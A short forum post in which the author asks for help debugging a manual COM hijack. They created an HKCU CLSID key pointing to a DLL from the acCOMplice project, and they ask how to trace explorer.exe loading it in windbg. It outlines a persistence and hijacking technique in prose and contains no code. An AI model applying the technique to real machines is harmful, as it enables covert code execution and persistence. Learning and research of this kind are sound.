Hi.
I am trying to get this working: https://github.com/nccgroup/acCOMplice
I compiled the dll and did the com hijacking by hand (I tried the tools too but I want to understand the whole thing a bit more and they did not do the job anyways…).
So as far as I understood the Code the whole thing works the following way:
I look for a HKCR key which has no corresponding HKCU key. And write my own dll into the HKCU key I created (with the same CLSID). The dll i used is taken from the github page I linked above.
But no matter which key I hijack the neither the key nor the COM directory (which is created by the dll code to contain the log file) show up. Since The new HKCU key seems to break the explorer.exe I am assuming that it is at least recognised by windows.
My question is: Is there a way to debug (e.g. in windbg) the calls of explorer.exe to my dll? And what am I doing wrong in the process I explained above?
greetings